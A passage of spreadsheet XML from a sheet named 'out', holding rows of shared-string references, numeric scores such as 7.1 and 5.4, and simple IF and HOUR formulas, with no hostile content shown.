        <v>1</v>
      </c>
      <c r="M343" s="4"/>
      <c r="N343" s="4"/>
      <c r="O343" s="13"/>
      <c r="P343" s="4"/>
      <c r="Q343" s="13">
        <f>HOUR(out!$P343 -out!$N343)</f>
        <v>0</v>
      </c>
      <c r="R343" s="18"/>
      <c r="S343" s="4"/>
      <c r="T343" s="4"/>
      <c r="U343" s="4"/>
      <c r="V343" s="7"/>
    </row>
    <row r="344" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A344" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B344" s="4" t="s">
        <v>2068</v>
      </c>
      <c r="C344" s="4" t="s">
        <v>2069</v>
      </c>
      <c r="D344" s="4" t="s">
        <v>2070</v>
      </c>
      <c r="E344" s="4" t="s">
        <v>2071</v>
      </c>
      <c r="F344" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G344" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H344" s="4">
        <v>7.1</v>
      </c>
      <c r="I344" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J344" s="4"/>
      <c r="K344" s="4"/>
      <c r="L344" s="4">
        <f>IF(out!$G344="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M344" s="4"/>
      <c r="N344" s="4"/>
      <c r="O344" s="13"/>
      <c r="P344" s="4"/>
      <c r="Q344" s="13">
        <f>HOUR(out!$P344 -out!$N344)</f>
        <v>0</v>
      </c>
      <c r="R344" s="18"/>
      <c r="S344" s="4"/>
      <c r="T344" s="4"/>
      <c r="U344" s="4"/>
      <c r="V344" s="7"/>
    </row>
    <row r="345" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A345" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B345" s="4" t="s">
        <v>2072</v>
      </c>
      <c r="C345" s="4" t="s">
        <v>2073</v>
      </c>
      <c r="D345" s="4" t="s">
        <v>2074</v>
      </c>
      <c r="E345" s="4" t="s">
        <v>2075</v>
      </c>
      <c r="F345" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G345" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H345" s="4">
        <v>7.1</v>
      </c>
      <c r="I345" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J345" s="4"/>
      <c r="K345" s="4"/>
      <c r="L345" s="4">
        <f>IF(out!$G345="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M345" s="4"/>
      <c r="N345" s="4"/>
      <c r="O345" s="13"/>
      <c r="P345" s="4"/>
      <c r="Q345" s="13">
        <f>HOUR(out!$P345 -out!$N345)</f>
        <v>0</v>
      </c>
      <c r="R345" s="18"/>
      <c r="S345" s="4"/>
      <c r="T345" s="4"/>
      <c r="U345" s="4"/>
      <c r="V345" s="7"/>
    </row>
    <row r="346" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A346" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B346" s="4" t="s">
        <v>2076</v>
      </c>
      <c r="C346" s="4" t="s">
        <v>2077</v>
      </c>
      <c r="D346" s="4" t="s">
        <v>2078</v>
      </c>
      <c r="E346" s="4" t="s">
        <v>2079</v>
      </c>
      <c r="F346" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G346" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H346" s="4">
        <v>7.1</v>
      </c>
      <c r="I346" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J346" s="4"/>
      <c r="K346" s="4"/>
      <c r="L346" s="4">
        <f>IF(out!$G346="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M346" s="4"/>
      <c r="N346" s="4"/>
      <c r="O346" s="13"/>
      <c r="P346" s="4"/>
      <c r="Q346" s="13">
        <f>HOUR(out!$P346 -out!$N346)</f>
        <v>0</v>
      </c>
      <c r="R346" s="18"/>
      <c r="S346" s="4"/>
      <c r="T346" s="4"/>
      <c r="U346" s="4"/>
      <c r="V346" s="7"/>
    </row>
    <row r="347" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A347" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B347" s="4" t="s">
        <v>2080</v>
      </c>
      <c r="C347" s="4" t="s">
        <v>2081</v>
      </c>
      <c r="D347" s="4" t="s">
        <v>2082</v>
      </c>
      <c r="E347" s="4" t="s">
        <v>2083</v>
      </c>
      <c r="F347" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G347" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H347" s="4">
        <v>7.1</v>
      </c>
      <c r="I347" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J347" s="4"/>
      <c r="K347" s="4"/>
      <c r="L347" s="4">
        <f>IF(out!$G347="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M347" s="4"/>
      <c r="N347" s="4"/>
      <c r="O347" s="13"/>
      <c r="P347" s="4"/>
      <c r="Q347" s="13">
        <f>HOUR(out!$P347 -out!$N347)</f>
        <v>0</v>
      </c>
      <c r="R347" s="18"/>
      <c r="S347" s="4"/>
      <c r="T347" s="4"/>
      <c r="U347" s="4"/>
      <c r="V347" s="7"/>
    </row>
    <row r="348" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A348" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B348" s="4" t="s">
        <v>2084</v>
      </c>
      <c r="C348" s="4" t="s">
        <v>2085</v>
      </c>
      <c r="D348" s="4" t="s">
        <v>2086</v>
      </c>
      <c r="E348" s="4" t="s">
        <v>2087</v>
      </c>
      <c r="F348" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G348" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H348" s="4">
        <v>7.1</v>
      </c>
      <c r="I348" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J348" s="4"/>
      <c r="K348" s="4"/>
      <c r="L348" s="4">
        <f>IF(out!$G348="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M348" s="4"/>
      <c r="N348" s="4"/>
      <c r="O348" s="13"/>
      <c r="P348" s="4"/>
      <c r="Q348" s="13">
        <f>HOUR(out!$P348 -out!$N348)</f>
        <v>0</v>
      </c>
      <c r="R348" s="18"/>
      <c r="S348" s="4"/>
      <c r="T348" s="4"/>
      <c r="U348" s="4"/>
      <c r="V348" s="7"/>
    </row>
    <row r="349" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A349" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B349" s="4" t="s">
        <v>2088</v>
      </c>
      <c r="C349" s="4" t="s">
        <v>2089</v>
      </c>
      <c r="D349" s="4" t="s">
        <v>2090</v>
      </c>
      <c r="E349" s="4" t="s">
        <v>2091</v>
      </c>
      <c r="F349" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G349" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H349" s="4">
        <v>7.1</v>
      </c>
      <c r="I349" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J349" s="4"/>
      <c r="K349" s="4"/>
      <c r="L349" s="4">
        <f>IF(out!$G349="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M349" s="4"/>
      <c r="N349" s="4"/>
      <c r="O349" s="13"/>
      <c r="P349" s="4"/>
      <c r="Q349" s="13">
        <f>HOUR(out!$P349 -out!$N349)</f>
        <v>0</v>
      </c>
      <c r="R349" s="18"/>
      <c r="S349" s="4"/>
      <c r="T349" s="4"/>
      <c r="U349" s="4"/>
      <c r="V349" s="7"/>
    </row>
    <row r="350" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A350" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B350" s="4" t="s">
        <v>2092</v>
      </c>
      <c r="C350" s="4" t="s">
        <v>2093</v>
      </c>
      <c r="D350" s="4" t="s">
        <v>2094</v>
      </c>
      <c r="E350" s="4" t="s">
        <v>2095</v>
      </c>
      <c r="F350" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G350" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H350" s="4">
        <v>5.4</v>
      </c>
      <c r="I350" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J350" s="4"/>
      <c r="K350" s="4"/>
      <c r="L350" s="4">
        <f>IF(out!$G350="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M350" s="4"/>
      <c r="N350" s="4"/>
      <c r="O350" s="13"/>
      <c r="P350" s="4"/>
      <c r="Q350" s="13">
        <f>HOUR(out!$P350 -out!$N350)</f>
        <v>0</v>
      </c>
      <c r="R350" s="18"/>
      <c r="S350" s="4"/>
      <c r="T350" s="4"/>
      <c r="U350" s="4"/>
      <c r="V350" s="7"/>
    </row>
    <row r="351" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A351" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B351" s="4" t="s">
        <v>2096</v>
      </c>
      <c r="C351" s="4" t="s">
        <v>2097</v>
      </c>
      <c r="D351" s="4" t="s">
        <v>2098</v>
      </c>
      <c r="E351" s="4" t="s">
        <v>2099</v>
      </c>
      <c r="F351" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G351" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H351" s="4">
        <v>7.1</v>
      </c>
      <c r="I351" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J351" s="4"/>
      <c r="K351" s="4"/>
      <c r="L351" s="4">
        <f>IF(out!$G351="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M351" s="4"/>
      <c r="N351" s="4"/>
      <c r="O351" s="13"/>
      <c r="P351" s="4"/>
      <c r="Q351" s="13">
        <f>HOUR(out!$P351 -out!$N351)</f>
        <v>0</v>
      </c>
      <c r="R351" s="18"/>
      <c r="S351" s="4"/>
      <c r="T351" s="4"/>
      <c r="U351" s="4"/>
      <c r="V351" s="7"/>
    </row>
    <row r="352" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A352" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B352" s="4" t="s">
        <v>2100</v>
      </c>
      <c r="C352" s="4" t="s">
        <v>2101</v>
      </c>
      <c r="D352" s="4" t="s">
        <v>2102</v>
      </c>
      <c r="E352" s="4" t="s">
        <v>2103</v>
      </c>
      <c r="F352" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G352" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H352" s="4">
        <v>7.1</v>
      </c>
      <c r="I352" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J352" s="4"/>
      <c r="K352" s="4"/>
      <c r="L352" s="4">
        <f>IF(out!$G352="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M352" s="4"/>
      <c r="N352" s="4"/>
      <c r="O352" s="13"/>
      <c r="P352" s="4"/>
      <c r="Q352" s="13">
        <f>HOUR(out!$P352 -out!$N352)</f>
        <v>0</v>
      </c>
      <c r="R352" s="18"/>
      <c r="S352" s="4"/>
      <c r="T352" s="4"/>
      <c r="U352" s="4"/>
      <c r="V352" s="7"/>
    </row>
    <row r="353" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A353" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B353" s="4" t="s">
        <v>2104</v>
      </c>
      <c r="C353" s="4" t="s">
        <v>2105</v>
      </c>
      <c r="D353" s="4" t="s">
        <v>2106</v>
      </c>
      <c r="E353" s="4" t="s">
        <v>2107</v>
      </c>
      <c r="F353" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G353" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H353" s="4">
        <v>5.4</v>
      </c>
      <c r="I353" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J353" s="4"/>
      <c r="K353" s="4"/>
      <c r="L353" s="4">
        <f>IF(out!$G353="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M353" s="4"/>
      <c r="N353" s="4"/>
      <c r="O353" s="13"/>
      <c r="P353" s="4"/>
      <c r="Q353" s="13">
        <f>HOUR(out!$P353 -out!$N353)</f>
        <v>0</v>
      </c>
      <c r="R353" s="18"/>
      <c r="S353" s="4"/>
      <c r="T353" s="4"/>
      <c r="U353" s="4"/>
      <c r="V353" s="7"/>
    </row>
    <row r="354" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A354" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B354" s="4" t="s">
        <v>2108</v>
      </c>
      <c r="C354" s="4" t="s">
        <v>2109</v>
      </c>
      <c r="D354" s="4" t="s">
        <v>2110</v>
      </c>
      <c r="E354" s="4" t="s">
        <v>2111</v>
      </c>
      <c r="F354" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G354" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H354" s="4">
        <v>7.1</v>
      </c>
      <c r="I354" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J354" s="4"/>
      <c r="K354" s="4"/>
      <c r="L354" s="4">
        <f>IF(out!$G354="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M354" s="4"/>
      <c r="N354" s="4"/>
      <c r="O354" s="13"/>
      <c r="P354" s="4"/>
      <c r="Q354" s="13">
        <f>HOUR(out!$P354 -out!$N354)</f>
        <v>0</v>
      </c>
      <c r="R354" s="18"/>
      <c r="S354" s="4"/>
      <c r="T354" s="4"/>
      <c r="U354" s="4"/>
      <c r="V354" s="7"/>
    </row>
    <row r="355" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A355" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B355" s="4" t="s">
        <v>2112</v>
      </c>
      <c r="C355" s="4" t="s">
        <v>2113</v>
      </c>
      <c r="D355" s="4" t="s">
        <v>2114</v>
      </c>
      <c r="E355" s="4" t="s">
        <v>2115</v>
      </c>
      <c r="F355" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G355" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H355" s="4">
        <v>7.1</v>
      </c>
      <c r="I355" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J355" s="4"/>
      <c r="K355" s="4"/>
      <c r="L355" s="4">
        <f>IF(out!$G355="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M355" s="4"/>
      <c r="N355" s="4"/>
      <c r="O355" s="13"/>
      <c r="P355" s="4"/>
      <c r="Q355" s="13">
        <f>HOUR(out!$P355 -out!$N355)</f>
        <v>0</v>
      </c>
      <c r="R355" s="18"/>
      <c r="S355" s="4"/>
      <c r="T355" s="4"/>
      <c r="U355" s="4"/>
      <c r="V355" s="7"/>
    </row>
    <row r="356" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A356" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B356" s="4" t="s">
        <v>2116</v>
      </c>
      <c r="C356" s="4" t="s">
        <v>2117</v>
      </c>
      <c r="D356" s="4" t="s">
        <v>2118</v>
      </c>
      <c r="E356" s="4" t="s">
        <v>2119</v>
      </c>
      <c r="F356" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G356" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H356" s="4">
        <v>7.1</v>
      </c>
      <c r="I356" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J356" s="4"/>
      <c r="K356" s="4"/>
      <c r="L356" s="4">
        <f>IF(out!$G356="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M356" s="4"/>
      <c r="N356" s="4"/>
      <c r="O356" s="13"/>
      <c r="P356" s="4"/>
      <c r="Q356" s="13">
        <f>HOUR(out!$P356 -out!$N356)</f>
        <v>0</v>
      </c>
      <c r="R356" s="18"/>
      <c r="S356" s="4"/>
      <c r="T356" s="4"/>
      <c r="U356" s="4"/>
      <c r="V356" s="7"/>
    </row>
    <row r="357" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A357" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B357" s="4" t="s">
        <v>2120</v>
      </c>
      <c r="C357" s="4" t="s">
        <v>2121</v>
      </c>
      <c r="D357" s="4" t="s">
        <v>2122</v>
      </c>
      <c r="E357" s="4" t="s">
        <v>2123</v>
      </c>
      <c r="F357" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G357" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H357" s="4">
        <v>7.1</v>
      </c>
      <c r="I357" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J357" s="4"/>
      <c r="K357" s="4"/>
      <c r="L357" s="4">
        <f>IF(out!$G357="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M357" s="4"/>
      <c r="N357" s="4"/>
      <c r="O357" s="13"/>
      <c r="P357" s="4"/>
      <c r="Q357" s="13">
        <f>HOUR(out!$P357 -out!$N357)</f>
        <v>0</v>
      </c>
      <c r="R357" s="18"/>
      <c r="S357" s="4"/>
      <c r="T357" s="4"/>
      <c r="U357" s="4"/>
      <c r="V357" s="7"/>
    </row>
    <row r="358" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A358" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B358" s="4" t="s">
        <v>2124</v>
      </c>
      <c r="C358" s="4" t="s">
        <v>2125</v>
      </c>
      <c r="D358" s="4" t="s">
        <v>2126</v>
      </c>
      <c r="E358" s="4" t="s">
        <v>2127</v>
      </c>
      <c r="F358" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G358" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H358" s="4">
        <v>7.1</v>
      </c>
      <c r="I358" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J358" s="4"/>
      <c r="K358" s="4"/>
      <c r="L358" s="4">
        <f>IF(out!$G358="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M358" s="4"/>
      <c r="N358" s="4"/>
      <c r="O358" s="13"/>
      <c r="P358" s="4"/>
      <c r="Q358" s="13">
        <f>HOUR(out!$P358 -out!$N358)</f>
        <v>0</v>
      </c>
      <c r="R358" s="18"/>
      <c r="S358" s="4"/>
      <c r="T358" s="4"/>
      <c r="U358" s="4"/>
      <c r="V358" s="7"/>
    </row>
    <row r="359" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A359" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B359" s="4" t="s">
        <v>2128</v>
      </c>
      <c r="C359" s="4" t="s">
        <v>2129</v>
      </c>
      <c r="D359" s="4" t="s">
        <v>2130</v>
      </c>
      <c r="E359" s="4" t="s">
        <v>2131</v>
      </c>
      <c r="F359" s="4" t="s">
        <v>530</v>
      </c>
      <c r="G359" s="4" t="s">
        <v>531</v>
      </c>
      <c r="H359" s="4">
        <v>7.1</v>
      </c>
      <c r="I359" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J359" s="4"/>
      <c r="K359" s="4"/>
      <c r="L359" s="4">
        <f>IF(out!$G359="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M359" s="4"/>
      <c r="N359" s="4"/>
      <c r="O359" s="13"/>
      <c r="P359" s="4"/>
      <c r="Q359" s="13">
        <f>HOUR(out!$P359 -out!$N359)</f>
        <v>0</v>
      </c>
      <c r="R359" s="18"/>
      <c r="S359" s="4"/>
      <c r="T359" s="4"/>
      <c r="U359" s="4"/>
      <c r="V359" s="7"/>
    </row>
    <row r="360" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A360" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B360" s="4" t="s">
        <v>2132</v>
      </c>
      <c r="C360" s="4" t="s">
        <v>2133</v>
      </c>
      <c r="D360" s="4" t="s">
        <v>2134</v>
      </c>
      <c r="E360" s="4" t="s">
        <v>2135</v>
      </c>
      <c r="F360" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G360" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H360" s="4">
        <v>5.4</v>
      </c>
      <c r="I360" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J360" s="4"/>
      <c r="K360" s="4"/>
      <c r="L360" s="4">
        <f>IF(out!$G360="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M360" s="4"/>
      <c r="N360" s="4"/>
      <c r="O360" s="13"/>
      <c r="P360" s="4"/>
      <c r="Q360" s="13">
        <f>HOUR(out!$P360 -out!$N360)</f>
        <v>0</v>
      </c>
      <c r="R360" s="18"/>
      <c r="S360" s="4"/>
      <c r="T360" s="4"/>
      <c r="U360" s="4"/>
      <c r="V360" s="7"/>
    </row>
    <row r="361" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A361" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B361" s="4" t="s">
        <v>2136</v>
      </c>
      <c r="C361" s="4" t="s">
        <v>2137</v>
      </c>
      <c r="D361" s="4" t="s">
        <v>2138</v>
      </c>
      <c r="E361" s="4" t="s">
        <v>2139</v>
      </c>
      <c r="F361" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G361" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H361" s="4">
        <v>7.1</v>
      </c>
      <c r="I361" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J361" s="4"/>
      <c r="K361" s="4"/>
      <c r="L361" s="4">
        <f>IF(out!$G361="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M361" s="4"/>
      <c r="N361" s="4"/>
      <c r="O361" s="13"/>
      <c r="P361" s="4"/>
      <c r="Q361" s="13">
        <f>HOUR(out!$P361 -out!$N361)</f>
        <v>0</v>
      </c>
      <c r="R361" s="18"/>
      <c r="S361" s="4"/>
      <c r="T361" s="4"/>
      <c r="U361" s="4"/>
      <c r="V361" s="7"/>
    </row>
    <row r="362" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A362" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B362" s="4" t="s">
        <v>2140</v>
      </c>
      <c r="C362" s="4" t="s">
        <v>2141</v>
      </c>
      <c r="D362" s="4" t="s">
        <v>2142</v>
      </c>
      <c r="E362" s="4" t="s">
        <v>2143</v>
      </c>
      <c r="F362" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G362" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H362" s="4">
        <v>7.1</v>
      </c>
      <c r="I362" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J362" s="4"/>
      <c r="K362" s="4"/>
      <c r="L362" s="4">
        <f>IF(out!$G362="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M362" s="4"/>
      <c r="N362" s="4"/>
      <c r="O362" s="13"/>
      <c r="P362" s="4"/>
      <c r="Q362" s="13">
        <f>HOUR(out!$P362 -out!$N362)</f>
        <v>0</v>
      </c>
      <c r="R362" s="18"/>
      <c r="S362" s="4"/>
      <c r="T362" s="4"/>
      <c r="U362" s="4"/>
      <c r="V362" s="7"/>
    </row>
    <row r="363" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A363" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B363" s="4" t="s">
        <v>2144</v>
      </c>
      <c r="C363" s="4" t="s">
        <v>2145</v>
      </c>
      <c r="D363" s="4" t="s">
        <v>2146</v>
      </c>
      <c r="E363" s="4" t="s">
        <v>2147</v>
      </c>
      <c r="F363" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G363" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H363" s="4">
        <v>7.1</v>
      </c>
      <c r="I363" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J363" s="4"/>
      <c r="K363" s="4"/>
      <c r="L363" s="4">
        <f>IF(out!$G363="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M363" s="4"/>
      <c r="N363" s="4"/>
      <c r="O363" s="13"/>
      <c r="P363" s="4"/>
      <c r="Q363" s="13">
        <f>HOUR(out!$P363 -out!$N363)</f>
        <v>0</v>
      </c>
      <c r="R363" s="18"/>
      <c r="S363" s="4"/>
      <c r="T363" s="4"/>
      <c r="U363" s="4"/>
      <c r="V363" s="7"/>
    </row>
    <row r="364" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A364" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B364" s="4" t="s">
        <v>2148</v>
      </c>
      <c r="C364" s="4" t="s">
        <v>2149</v>
      </c>
      <c r="D364" s="4" t="s">
        <v>2150</v>
      </c>
      <c r="E364" s="4" t="s">
        <v>2151</v>
      </c>
      <c r="F364" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G364" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H364" s="4">
        <v>7.1</v>
      </c>
      <c r="I364" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J364" s="4"/>
      <c r="K364" s="4"/>
      <c r="L364" s="4">
        <f>IF(out!$G364="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M364" s="4"/>
      <c r="N364" s="4"/>
      <c r="O364" s="13"/>
      <c r="P364" s="4"/>
      <c r="Q364" s="13">
        <f>HOUR(out!$P364 -out!$N364)</f>
        <v>0</v>
      </c>
      <c r="R364" s="18"/>
      <c r="S364" s="4"/>
      <c r="T364" s="4"/>
      <c r="U364" s="4"/>
      <c r="V364" s="7"/>
    </row>
    <row r="365" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A365" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B365" s="4" t="s">
        <v>2152</v>
      </c>
      <c r="C365" s="4" t="s">
        <v>2153</v>
      </c>
      <c r="D365" s="4" t="s">
        <v>2154</v>
      </c>
      <c r="E365" s="4" t="s">
        <v>2155</v>
      </c>
      <c r="F365" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G365" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H365" s="4">
        <v>7.1</v>
      </c>
      <c r="I365" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J365" s="4"/>
      <c r="K365" s="4"/>
      <c r="L365" s="4">
        <f>IF(out!$G365="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M365" s="4"/>
      <c r="N365" s="4"/>
      <c r="O365" s="13"/>
      <c r="P365" s="4"/>
      <c r="Q365" s="13">
        <f>HOUR(out!$P365 -out!$N365)</f>
        <v>0</v>
      </c>
      <c r="R365" s="18"/>
      <c r="S365" s="4"/>
      <c r="T365" s="4"/>
      <c r="U365" s="4"/>
      <c r="V365" s="7"/>
    </row>
    <row r="366" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A366" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B366" s="4" t="s">
        <v>2156</v>
      </c>
      <c r="C366" s="4" t="s">
        <v>2157</v>
      </c>
      <c r="D366" s="4" t="s">
        <v>2158</v>
      </c>
      <c r="E366" s="4" t="s">
        <v>2159</v>
      </c>
      <c r="F366" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G366" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H366" s="4">
        <v>7.1</v>
      </c>
      <c r="I366" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J366" s="4"/>
      <c r="K366" s="4"/>
      <c r="L366" s="4">
        <f>IF(out!$G366="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M366" s="4"/>
      <c r="N366" s="4"/>
      <c r="O366" s="13"/>
      <c r="P366" s="4"/>
      <c r="Q366" s="13">
        <f>HOUR(out!$P366 -out!$N366)</f>
        <v>0</v>
      </c>
      <c r="R366" s="18"/>
      <c r="S366" s="4"/>
      <c r="T366" s="4"/>
      <c r="U366" s="4"/>
      <c r="V366" s="7"/>
    </row>
    <row r="367" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A367" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B367" s="4" t="s">
        <v>2160</v>
      </c>
      <c r="C367" s="4" t="s">
        <v>2161</v>
      </c>
      <c r="D367" s="4" t="s">
        <v>2162</v>
      </c>
      <c r="E367" s="4" t="s">
        <v>2163</v>
      </c>
      <c r="F367" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G367" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H367" s="4">
        <v>7.1</v>
      </c>
      <c r="I367" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J367" s="4"/>
      <c r="K367" s="4"/>
      <c r="L367" s="4">
        <f>IF(out!$G367="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M367" s="4"/>
      <c r="N367" s="4"/>
      <c r="O367" s="13"/>
      <c r="P367" s="4"/>
      <c r="Q367" s="13">
        <f>HOUR(out!$P367 -out!$N367)</f>
        <v>0</v>
      </c>
      <c r="R367" s="18"/>
      <c r="S367" s="4"/>
      <c r="T367" s="4"/>
      <c r="U367" s="4"/>
      <c r="V367" s="7"/>
    </row>
    <row r="368" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A368" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B368" s="4" t="s">
        <v>2164</v>
      </c>
      <c r="C368" s="4" t="s">
        <v>2165</v>
      </c>
      <c r="D368" s="4" t="s">
        <v>2166</v>
      </c>
      <c r="E368" s="4" t="s">
        <v>2167</v>
      </c>
      <c r="F368" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G368" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H368" s="4">
        <v>7.1</v>
      </c>
      <c r="I368" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J368" s="4"/>
      <c r="K368" s="4"/>
      <c r="L368" s="4">
        <f>IF(out!$G368="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M368" s="4"/>
      <c r="N368" s="4"/>
